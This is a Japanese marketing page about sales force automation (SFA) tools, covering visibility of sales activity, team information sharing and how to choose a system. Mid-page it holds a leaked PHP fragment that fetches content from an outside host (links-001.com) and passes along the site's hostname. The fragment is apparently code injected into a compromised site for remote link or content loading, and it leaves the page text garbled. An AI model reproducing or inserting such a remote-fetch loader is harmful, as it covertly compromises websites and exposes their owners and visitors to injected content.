革新的な技術で世の中を動かす企業を目指します

SFAとは

ビル

SFAとは、営業プロセスや情報をシステムにより可視化できるようにしたものです。
これにより管理業務の効率化と営業効果が向上するので、業務も捗ること間違いないですね。
営業業務は少なからず「勘」「根性」「経験」の精神論があったかと思います。
SFAを導入することで、データとして閲覧でき新人営業マンの方でもしっかりと営業に活かせますね。
システム上で過去の商談履歴や現在進行中の進捗状況、スケジュール確認などができ、それを基に、チーム一丸で活動をすることが出来るので営業の生産性の向上に一役買いそうですね。
SFAは目標の可視化による、組織の強化が見込めるので、将来的にも企業に対して経営の根幹を握るシステムになると思います。
やはり、データとして可視化でき営業業務にあたれるのと、あたれないのとでは業績に差が開く要因になるのではないでしょうか。
顧客情報の貯蓄・分析による売上。
商談成功率の向上。
教育コストの削減にも一役買うSFA導入はいかがでしょうか?

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連ページ

SFA導入にあたって

実際にSFAを導入するにあたって「操作が簡単で現場で使いやすい」点と「サポート内容と実績」この2点が

SFAとCRMを使い分けよう

SFAとCRMそれぞれの特徴をご紹介!特徴を理解したうえでシステム導入すると失敗しないので、ポイント

SFAのメリットデメリットとは

<メリット>①営業活動を可視化できる②チームでの情報共有が可能に③業務の無駄を削除できる。

SFAの選び方

実際にどこのSFAがいいの?沢山の選ぶポイントがありますが、自社にあったポイントで選びましょう。